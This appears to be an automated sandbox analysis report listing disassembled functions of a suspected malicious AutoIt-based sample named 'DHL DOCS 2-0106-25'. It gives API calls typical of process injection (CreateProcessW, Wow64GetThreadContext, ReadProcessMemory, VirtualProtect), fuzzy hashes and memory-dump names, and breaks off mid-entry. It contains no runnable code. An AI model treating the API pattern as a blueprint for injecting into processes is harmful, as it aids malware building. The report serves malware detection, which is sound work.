RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001B3B0F,SwapMouseButtons,00000004,?), ref: 001B3B83

Strings

Control Panel\Mouse, xrefs: 001B3B3E

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: cd0141d1449df21c84124a458138b3a5dfdea3b76c8214a31693632916b2178e
Instruction ID: 6f732181f3601c382de545c58f7335ebb383cd6868d2b0b47a0e0caf1dbabad7
Opcode Fuzzy Hash: cd0141d1449df21c84124a458138b3a5dfdea3b76c8214a31693632916b2178e
Instruction Fuzzy Hash: EF115AB5511208FFDB218FA8DD48AEEB7B8EF01740B104559E811D7214D7319E509760

Function 01188BC8 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01189383
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01189419
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0118943B

Memory Dump Source

Source File: 00000000.00000002.1660351923.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: 9dc1cfb9a41591c8cc67f92519d9136dfe3a9afcd147fea27d6878cc06a1a492
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: 99620D30A146189BEB28DFA4C850BEEB771EF98304F1091A9D10DEB294E7759E81CF59

Function 001B3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001F33A2

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 001B3A04

Strings

Line: , xrefs: 001F33EB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: c25a4afdb793272676d313a0b84fb02bedbbd93f5d89479fe3da80caddb92d03
Instruction ID: 9807515e4e08af4319d017a5c917b2cd95888d743cad55d739f16dda5799e1a2
Opcode Fuzzy Hash: c25a4afdb793272676d313a0b84fb02bedbbd93f5d89479fe3da80caddb92d03
Instruction Fuzzy Hash: C831F271409304ABC325EB20EC49BEBB7ECAF61314F10456EF5A9831D1EB749A69C7C2

Function 001B2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 001F2C8C

Part of subcall function 001B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B3A97,?,?,001B2E7F,?,?,?,00000000), ref: 001B3AC2

Part of subcall function 001B2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001B2DC4

Strings

`e', xrefs: 001F2C85
X, xrefs: 001F2C5A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e'
API String ID: 779396738-340175575
Opcode ID: c35a5b0bed86640a8873bf5a2bf1ffab3f8ac679b995f086b28b7d548ba6bffa
Instruction ID: e42c799af479335b603a131c6198ce7483136c85d5eac2b22478c7737f71c61c
Opcode Fuzzy Hash: c35a5b0bed86640a8873bf5a2bf1ffab3f8ac679b995f086b28b7d548ba6bffa
Instruction Fuzzy Hash: 0821A571A1025C9FCB01DF94C849BEE7BFCAF59304F008059E519A7241DBB89A5D8F61

Function 001CFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 001D0668

Part of subcall function 001D32A4: RaiseException.KERNEL32(?,?,?,001D068A,?,00281444,?,?,?,?,?,?,001D068A,001B1129,00278738,001B1129), ref: 001D3304

__CxxThrowException@8.LIBVCRUNTIME ref: 001D0685

Strings

Unknown exception, xrefs: 001D0692

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 142f3b2828a8c92dcb0f60a387bc4cae0c7597b5a4eb5dd794bbd808f0136020
Instruction ID: 6215c68bc32ad97623afc7fc0d517c6d5754095963f00c3fb350946c81db9c25
Opcode Fuzzy Hash: 142f3b2828a8c92dcb0f60a387bc4cae0c7597b5a4eb5dd794bbd808f0136020
Instruction Fuzzy Hash: 57F0F63490020DB7CB05BAB4EC4AEAE7B6D5E64350F60413BB828D67D1EF71EA26C5C1

Function 00237F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002382F5
TerminateProcess.KERNEL32(00000000), ref: 002382FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002384DD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 09e7682d148ecb2239ed2f0de89a6c0afd727cd985791298683721948712cfd6
Instruction ID: de5d659b9f8d7656e99591e49341a002dc01ebc866c132175f2439b58334a754
Opcode Fuzzy Hash: 09e7682d148ecb2239ed2f0de89a6c0afd727cd985791298683721948712cfd6
Instruction Fuzzy Hash: D8126BB1A183419FC724DF28C484B6ABBE1BF88314F14895DF9898B352DB71E945CF92

Function 001E86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,001E85CC,?,00278CC8,0000000C), ref: 001E8704
GetLastError.KERNEL32(?,001E85CC,?,00278CC8,0000000C), ref: 001E870E
__dosmaperr.LIBCMT ref: 001E8739

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: fd9cdd35dc335498a6f00907d6a1d8a3ed0b496ee66a7ed268a701b4e587e7f4
Instruction ID: 8b37cb8bc416f8f76f87e9ef8085235314e4755dc3bcccbfab11d77dba6d87d9
Opcode Fuzzy Hash: fd9cdd35dc335498a6f00907d6a1d8a3ed0b496ee66a7ed268a701b4e587e7f4
Instruction Fuzzy Hash: 0B016B32A05EE016C3686637684977E6B4A4BA6778F390119F81C8B1D2DFA0CCC18250

Function 001C1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001C17F6

Strings

CALL, xrefs: 001C17C6

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 25c796515d81f281d910048e50888ff4ca6ba2d105dc703d489c5a2ddda6abed
Instruction ID: b2afa95bcda0ec1600bedb70943a258328c176df4924967b4fc16fb42901d766
Opcode Fuzzy Hash: 25c796515d81f281d910048e50888ff4ca6ba2d105dc703d489c5a2ddda6abed
Instruction Fuzzy Hash: 8C227A70648301AFC714DF14C484F2ABBF1BFAA314F64895DF4968B2A2D771E865CB92

Function 001B3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 001B3908

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 658b4879d4cafc290e950fe4be473968f2f45aab6afa995ce34c383efd30c499
Instruction ID: a00b0112112e6ed94426c249cda1fa5d2c667ba390e88a51add9c22bf72b2257
Opcode Fuzzy Hash: 658b4879d4cafc290e950fe4be473968f2f45aab6afa995ce34c383efd30c499
Instruction Fuzzy Hash: 5F31B474505701DFD721DF24E8887D7BBE8FB49708F00096EF6A983280E771AA55CB52

Function 001B5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,001B949C,?,00008000), ref: 001B5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,001B949C,?,00008000), ref: 001F4052

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 24f60a4ed144c6eadb585418e8c1717b9d4217f2364ae31975a26a6463a6bf60
Instruction ID: ed42cd088d31f27c5341afaed9b19b71266b90ca39915f73c96c70959caabba6
Opcode Fuzzy Hash: 24f60a4ed144c6eadb585418e8c1717b9d4217f2364ae31975a26a6463a6bf60
Instruction Fuzzy Hash: 8A012931245225B6E3704A2ADC0EFE77E99AF067B0F158210FAAC6A1E0CBB45855CB90

Function 01188BC5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01189383
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01189419
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0118943B

Memory Dump Source

Source File: 00000000.00000002.1660351923.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: d02c17786567fda1f6282526aecde5c60a64e08b3b8e9bcee6089bfc5ff1e8fd
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: C712C024E18658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A

Function 0023709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 269384e4c36903d6b49a207517a1b070e7bcc507f6e19738cff029ea3326a173
Instruction ID: 7fe667c7d6c9711466e6ebcbded8438e3d4375b7fa58a0697e0bf7e2d0c382be
Opcode Fuzzy Hash: 269384e4c36903d6b49a207517a1b070e7bcc507f6e19738cff029ea3326a173
Instruction Fuzzy Hash: DDD15CB5A1420AEFCF24EF98D8819EDBBB5FF58310F144059E905AB291DB70AD91CF90

Function 001CFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 001CFD1F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4611aacbe5fd28ce7b5a04b828f1254043dd05bd3ff9a32b602a0e38a2c8f0bc
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8331E474A001099BC718CF99D480E69FBA2FF69310B2586ADE80ACB655D731EDC2DBC4

Function 001B4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001B4EDD,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4E9C
Part of subcall function 001B4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001B4EAE
Part of subcall function 001B4E90: FreeLibrary.KERNEL32(00000000,?,?,001B4EDD,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4EFD

Part of subcall function 001B4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001F3CDE,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4E62
Part of subcall function 001B4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001B4E74
Part of subcall function 001B4E59: FreeLibrary.KERNEL32(00000000,?,?,001F3CDE,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4E87

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 6ac5b42282518a2dfe31bbbeb36eb788065e2f35bd00a69c74c79f15cf182af9
Instruction ID: 0aef5d68697774a2ce8c5a3c46a2fa1488c2e5f5005084603436b5b30109dbcf
Opcode Fuzzy Hash: 6ac5b42282518a2dfe31bbbeb36eb788065e2f35bd00a69c74c79f15cf182af9
Instruction Fuzzy Hash: 1D11C432610205ABDB14FB68DC42BED77A59F60710F20842EF542A71C2EF74DA459B50

Function 001E8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 001E8440

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 87beb952f35318f489a6f392ad75e9bfd3cb39f74f09205c356b9363ea11c30c
Instruction ID: eafc608a8a0105a19c7ab2d5ca145ce442184f1799415df148d92dc358f3d465
Opcode Fuzzy Hash: 87beb952f35318f489a6f392ad75e9bfd3cb39f74f09205c356b9363ea11c30c
Instruction Fuzzy Hash: 9D11487590410AAFCB05DF59E940A9E7BF4EF48314F104059F808AB352DB30EA11CBA4

Function 001E5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001E4C7D: RtlAllocateHeap.NTDLL(00000008,001B1129,00000000,?,001E2E29,00000001,00000364,?,?,?,001DF2DE,001E3863,00281444,?,001CFDF5,?), ref: 001E4CBE

_free.LIBCMT ref: 001E506C

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 3bff4139bd2477263169505700b17549941e7f21d78f413ad51a20167c23e1f6
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: BA012672204B446BE3218E669885A5EFBEDFB89374F25051DF194832C0EB70A805C7B4

Function 001DE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: ddf33f837cdd92f6549d4e0de9d2644b0131bfe22d3c7635ce4c55c8bb68f1ae
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: DEF0F432510E1496C7353A6A9C05B9A33DC9F7233AF11071BF4259B3D2DB74E802CAA5

Function 001B9CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001B9CBD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 99fb498a12ebe6f067dd40cb065526ac2db21f13e3a9b33040f6849aa9f19f18
Instruction ID: bfbd2381c0ba7977c29150b2d0c0914da8f72d816705041f596b3d525d956eec
Opcode Fuzzy Hash: 99fb498a12ebe6f067dd40cb065526ac2db21f13e3a9b33040f6849aa9f19f18
Instruction Fuzzy Hash: 3BF0A4B26006006FD7159F69D806FAABB94EB54760F10852EF619CB2D1DB31E510C6A0

Function 001E4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,001B1129,00000000,?,001E2E29,00000001,00000364,?,?,?,001DF2DE,001E3863,00281444,?,001CFDF5,?), ref: 001E4CBE

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ab0f0dbfb66dfc73e82e4f019b7aa57ac1ea621fe6c69309b81fe8f297379fa4
Instruction ID: 966e67a2dc8e62ddca34fbbf5be92a8808340e9d0f79c7df84f9d5559619f6c5
Opcode Fuzzy Hash: ab0f0dbfb66dfc73e82e4f019b7aa57ac1ea621fe6c69309b81fe8f297379fa4
Instruction Fuzzy Hash: A9F0E231603AA467DB255F67AC09B5F3788BF917A0B394126B81AAB6D0CB30D80196E0

Function 001E3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

